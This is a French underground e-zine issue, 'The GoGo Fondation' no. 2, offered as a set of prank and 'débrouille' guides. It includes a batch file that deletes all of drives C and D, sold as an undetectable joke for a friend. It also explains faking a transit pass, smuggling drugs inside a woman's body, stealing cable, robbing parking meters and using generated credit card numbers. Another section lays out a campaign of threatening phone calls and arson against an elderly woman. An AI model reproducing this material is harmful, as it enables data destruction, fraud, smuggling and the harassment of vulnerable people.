x751a24                        ÛÛÛÛÛÛÛÛÛÛÛÛ      --*--    '
               --*--           Û2222222222Û       ''  --*--      '    --*--
 --*--                          Û        Û
      The GoGo    '             Û        Û     '    --*--           '
     FoNdAtIOn      --*--      Û          Û      '        --*--
     Come Back !!!            Û            Û          --*--   T.H.E         '
       --*--         ,      ÛÛ              ÛÛ           D.A.U.B.E.S.Q.U.E   
   '                      ÛÛÛ                ÛÛÛ           J.O.U.R.N.A.L
                          Û÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷Û       --*--   Nø2
     '          ''   ,    Û÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷Û                 --*--
      --*--               Û÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷Û         --*--
            '             Û--------------------Û      ' '
 --*--          '         Û I-I ä I ï < k ä ³\³Û       '           '    '
       --*--      \|/     Û                    Û              --*--
 ''              --*--    Û        ThE         Û        '           --*--
--*--        ''   /|\     Û    /´.L.C.O.O.L    Û      --*--   '
         --*--            Û    C.H.O.I.C.H.E   Û                '  '
   ''       '             Û--------------------Û  /´dihash      --*--
                          Û÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷÷Û      &
            '             ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ    Yoda     

Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û
° I.   InTroDuCtiON                                                     °
± II.  CoMMeNt Se FaIrE UnE FaUsSE CaRtE OrAnGe                         ±
Û III. DrOgUeS DoUcEs ?                                                 Û
° IV.  CoMMeNt Se La JoUeR                                              °
± V.   CoMMeNt NiQuEz La DoAuNe                                         ±
Û VI.  ThE MaMi ShOw                                                    Û
° VII. ThE GoGo ChIoTTeS                                                °
±                                                                       ±
Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û°±Û

                        InTrOdUcTioN
                        ^^^^^^^^^^^^
Voix Off:
Bon,ce deuxiŠme num‚ro sort tout suite aprŠs le premier.
GoGo FoNdAtIoN CoMe BaCk !!!
Donc aucune r‚ponse que se soit n‚gatif ou positive.
Biens sur il ne faut pas lire ce texte !.
J'en D‚gage toutes responsabilit‚e
Nouvelles rubriques GoGo ChIoTTes:
Les Bas_fond de la d‚brouille.
Et on recherche un correcteur de toute URGENCE.


II.CoMMeNt FaIrE UnE FauSSe CaRtE OrAnGe
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Stop !!!!!!!!!!
Pas de fausses joie,ceci vous servira juste … passer les barrieres R.A.T.P 
en toute tranquilit‚...
Pour ce qui est du control du ticket,l… y'a problŠme...
Bon passons toute suite au zoli dessin:

Carte Orange:   
   -------       Technique:
   |  Û  |       Bon j'ai pas test‚ donc pas trop d'insultes :)
   |  Û  |       Prendre une cassette audio et d‚couper un petit        
   |  Û  |       morceau de bande magnetique (un peu plus que la
   |  Û  |       longueur du ticket ).
   |  Û  |       Maitenant emprumter la carte orange d'un ami et 
   |  Û  |       coller la bande au ticket.(du scoch,pas de la 
   ------       colle ;) ).Passez le montage dans la machine
      |                    retirez le ruban magnetique faite
      Bande Magn‚tique     un montage carton/ruban.
                           Et voila ta G.o.G.o Carte !


III.DrOgUeS DoUcES ?
^^^^^^^^^^^^^^^^^^^^^
De rares ‚nergumŠnes d‚coupent le fond d'une bouteille,percent le bouchon
de telle maniŠre que le corps d'un stylo s'y imbrique,roulent un joint dont
le filtre entre dans le corps du stylo,puis remplissent aux trois quarts 
un seau d'eau.
Ils appellent ‡a une PiPe … D‚PReSSiOn...
Alors,ils plongent la bouteille dans le seau... N'ayant Pas de fond,elle se
remplit d'eau.
Une fois le joint allum‚ sur sa rampe de lancement.Ils remontent doucement la
bouteille qui se vide de son eau,se remplit d'air et de fum‚e.
Ensuite,ils enlŠvent le p‚tard,effectuent le mouvement inverse et,la bouche
au-dessus de la bouteille,apirent la fum‚e.  *
Oh,les zolis dessins:                      *
                                         *
                                         \/
1/      u                        2/      u                 
  |    / \    |                    |    / \    |        u= Bouchon
  |   |   |   |                    |   |   |   |        \/= Joint
  |   |   |   |                    |   |   |   |        *= Fum‚e
  |°°°|°°°|°°°|                    |°°°|°°°|°°°|        °= Eau 
  |°°°|°°°|°°°|                    |°°°|°°°|°°°|        O*:= Visage
   ^^^^^^^^^^^                      ^^^^^^^^^^^    
         * *
        \/                                 * * O*:
        u                                *
3/     / \                       4/      u
  |   |***|   |                    |    / \    |
  |   |***|   |                    |   |   |   |
  |   |***|   |                    |   |   |   |
  |°°°|°°°|°°°|                    |°°°|°°°|°°°|
  |°°°°°°°°°°°|                    |°°°|°°°|°°°|
   ^^^^^^^^^^^                      ^^^^^^^^^^^
Tir‚ de "Fum‚e Clandestine" par Jean-Pierre Galland.


IV.CoMMeNt Se La JoUeR !
^^^^^^^^^^^^^^^^^^^^^^^^^
Vous connaŒssez un bouffon qui … chopp‚ la grosse tˆte...
Bon il vous raconte que c'est un pros des virus,patati et patata...
Bref voŒla de quoi lui calmer les neurones.
Un ptit fichier batch ind‚tecable !!!
Nommez-le GoGo.Bat Ou ByeDD.Bat
Voila la syntaxe:
@echo off
Deltree c:\*.* /y
Deltree d:\*.* /y

Et voila tchao le disque Dur.
En tache de fond windows c'est parfait!


V.CoMMeNt NiQuEz LeS FrOnTiErEs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Vous voulez faire passez tu teushi … la frontiŠre ?
Adihash et Yoda repondent … votre demande...
Bon le problŠme pour cette combine c'est qui faut une nana.
Grosse,Mince,Salope,Taspe,Brune,Rose fluo,n'importe quoi fera l'affaire.
Et de bons rapports avec la nana sont pr‚f‚rable.

Technique:
1/Prendre un Pr‚servatif.
2/Prendre Le TeUsHi.
3/Mettre le Teushi dans Capote. 
4/Laver la capote pour les odeurs.
5/Mettre la capote dans la foune de la meuf.
6/Faire un grand sourire aux Douaniers.
TesTeR ET AppRoUvEr Par GoGo FoNdATiOn.


VI.ThE MaMi ShOw 
^^^^^^^^^^^^^^^^^
Par /´dihash.

Bon on vous … pr‚venus dans le premier num‚ro "On EsT DeS CoNNaRdS D'AdOs".
Pendant une soir‚e bien enfumm‚e devant la t‚l‚.
Une grand-mŠre se faisait harceler pas un malade mental...
Cooooooooooooollllllllllllllll !!!!!!!!!
Noooouuusssssss Soooooooooommmmmmmmeees deeeees malades mENtal.
Haga ? zuKuk ? 
Je ne veux pas me vanter (bien que...),mais chez moi le malheur des autres
me fait toujours marrer(… petite echelle.),et d‚foncer les gens qui se 
prennent pour des StArS,se moquant des faibles pour se valeuriser,ou les
rascites... C'EsT MoN D.O.M.A.I.N.E... 
Donc cette fois ci la C.I.B.L.E c'est m‚m‚.
Nonnnn,pas la grand-mŠre de votre enfance.
La bonne et vielle m‚m‚ Parisienne qui compte ses sous,insulte les noirs dans
la rue et pousse ca geulante dans le m‚tro pour avoir sa place.
                           
                           ---------------
        //                 |M.I.S.S.I.O.N|               ---
       * *                 |  G.R.A.N.D  |          ----|   |----
        -                  |   M.E.R.E   |          |   R.I.P   |
      \---/                |     T.U     |          ----|   |----
                           |    V.A.S    |              |   |
                           |C.L.A.S.M.E.R|              |   |
                           ---------------              |---|


CoMpTe A ReBoUrS 9:
********************
Connaissez vous le film Gremlis ?
Non !
CourEz A VoTre ViDeO CluB PoUr Le VoIr,iL faut entendre les voix des gremlis.
Ou la voix D'E.T l'extratereste fera l'affaire...
Essayez de savoir le nom de la grand-mere,et guettez la une journ‚e.
Pour la voix ,entrainez vous,il faut que ayez mal … la gorge pour vous  
prouver que sa fonctionne.

CoMpTe A ReBoUrS 8:
*******************
"E.T T‚l‚Phooooonnne Maisssoonnnnnn...
3.Heures du mat,Le T‚l‚phone sonne chez grand mŠre
1--->5ø sonneries,m‚m‚ d‚cide de d‚crocher.
Vieille Peau: Allooo !!
Adihash: (ne pas parlez pendant 3 ou 4 secondes ).
Vieille Peau: ( elle racroche )
Adihash: (je r‚compose le num‚ro de mami,je laisse EnTenDre une forte
respiration et le gremlis prend possesion) hmmmfffffff,Mammmiiii
Petasse:Qui ˆtes vous ?,ca vous s'amuse ?
Adihash: Tageule Salooppeee...hmmmffffff!!!!!(respiration)
Bip...Bip...Bip...Bip...Bip...

CoMpTe A ReBoUrS 7:
*******************
Surtout ne pas la rappellez !
laissez mami penser un peu … ce coup de fil etrange pendant 1 ou 2 jours.
(c'est comme une bonne recette faut laisser mijot‚ !!!)

CoMpTe A ReBoUrS 6:
*******************
2 h du mat.
C Parti On rappelle !!!
Mami: Allo ?
Adihash: Je connais ton nom...
Crouton: EncoRe vOuS !
Adihash: Ne racrohezzz pas,je veuuxxx vous prevenir que XXX XXX (lui donnez 
son nom) vas se faire perforer l'anus...
Bip...Bip...Bip...Bip...Bip...

CoMpTe A ReBoUrS 5:
*******************
23 H,On re-rapelle !!!
Mami:allooo ??? 
Adihash: Mammmiiiiiii !!!!!!!
Bip...Bip...Bip...Bip...Bip...

CoMptE A ReBoUrS 4:
*******************
Brulez la BoŒte aux lettres de la grand-mŠre et celle du voisin. :)

CoMpTe A ReBoUrS 3:
*******************
23H,On l'appelle !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Mami:allo !
Adihash:(voix normal),Bonsoir madame je suis monsieur louga‹o le responble
du batiment,nous avons recu des plaintes de certains locataires comme quoi
il recevait des coups de fil obscenes... 
Est-ce votre cas ?.
Mami:ohh,ouii ca me soulage drolement,vous savez qui c'est ?
Sadique:(Gremlis poss‚ssion)ha.ha.ha.ha
T'es Morteeeeeee !!!!!!!
Bip...Bip...Bip...Bip...

CoMpTE A ReBoUrS 2:
*******************
Attendre 2 ou 3 jours,sinon elle ne d‚crochera pas.

CoMpTe A ReBoUrS 1:
*******************
Pret pour le final ?
On re-re-re-telephone...
Mami: allo ?
Sadique: (l… il faut lui resortir toutes les choses qu'elles a fait dans la
journ‚e ).
Mami:Laissez-moi,Tranquile de toute facon j'ai appel‚ la police...
Adihash: :(
Bip...Bip...Bip...Bip...

ThE FiNAL ShOw !
****************
le coup de grƒce !
L… il faut faire tres gaffe...
Et avoir des complices . ;-)
Les complices se cachent derriere la porte...
Le telePhOne sonne...
Mami dEcRochE...
Le SadiQuE ResPiRe...
Et les complices tapent commes des malades sur la porte de vieille et se
mettent … courir comme pas possible...
E.m.O.t.I.O.N.S !!!!!!!!!
G.A.r.A.n.T.i.S !!!!!!!!!


VII.ThE GoGo ChIoTTeS
^^^^^^^^^^^^^^^^^^^^^^
Voil… une rubrique qui citera les trucs les plus connus rapidemnt:
Le CablE:
Scrutez dans l'entr‚e de chez vous,les connexions de vos voisins !
Un Fil:C'est l'antenne
Deux Fils:Le cable + l'antenne
Bon cherchez le cable,une fois trouv‚,il vous faut un bidule qui permet un 
deuxiŠme branchement et un cable de bonne calit‚.
Pour planquer le branchement,le mieux c'est d'avoir de la moquette.
Bidule:   ----------
          ----  ----
             |  |
Y'a t'il un risque de vous faire prendre ?
Et oui,les gens du cable viennent quand quelqu'un arrete de s'abonner.
Trouver un arangement avec votre voisin ;) ...

PaRaBoL:
L… je suis vraiment pas sur de mon coup...
Il suffirait d'orienter sa petite parabol vers la grosse du voisin pour 
capter ses chaines.

ParcMŠtre:
Les Machines qui bouffent votre monnaie quand il faut vous garer.
Y'a deux techniques … ma conaissance:
1/ Un morceau de pexiglass couper en forme de triangle qu'il faut bloquer
l… ou tombe la monnaie...Et de revinir avec un marteau pour r‚colter.
2/Ma pr‚fer‚e il suffit d'inserer une piece de 20 centimes avec un ticket
de m‚tro,Et l… ca bloque le parcmŠtre !
Apres il suffit de d‚bloquer avec un autre ticket ou un bon gros kick in 
the face !!!!!

Conneries:
Appelez les num‚ros de t‚l‚phone porno gr…ce … un g‚n‚rateur de carte de
cr‚dit,(juste ‡a !,les autres soci‚t‚s verifient le num‚ro ).


                      Bon voil… c'est peu...
                      c'est … chier
                      c'est ridicule
                      En 3 mots
                     "ThE GoGo FoNdAtIoN"
                           
                                                 The TOX's
                                                   Rerporter's
                                                   /´dihash
                                                      &
                                                    Yoda

Bon comme dans tout bon g‚n‚rique de film,de serie,ou
les greets dans les bouquin.
Hum...
Humm...

//////////// Greets  \\\\\\\\\\\\\\\
Joe Satria... : Le seul (snif!) qui a bien voulu m'aider.
NeurMutant: Qui … ‚crit de trŠs bon philes...
Ma maman : Pour ses soins journalier
Mon chien rosco: Dont la r‚ponse pour le mariage est non !
\\\\\\\\\\\\ Finish //////////////////

Et je ferais un Couper/Coller
Pour la loi BBS X762143-44644-444-LAMERS
                     
                     [ DIFFUSER CE QUE VOUS SAVEZ ]
             [ LES VRAIS LAMERS SONT CEUX QUI NE DISENT RIEN ]


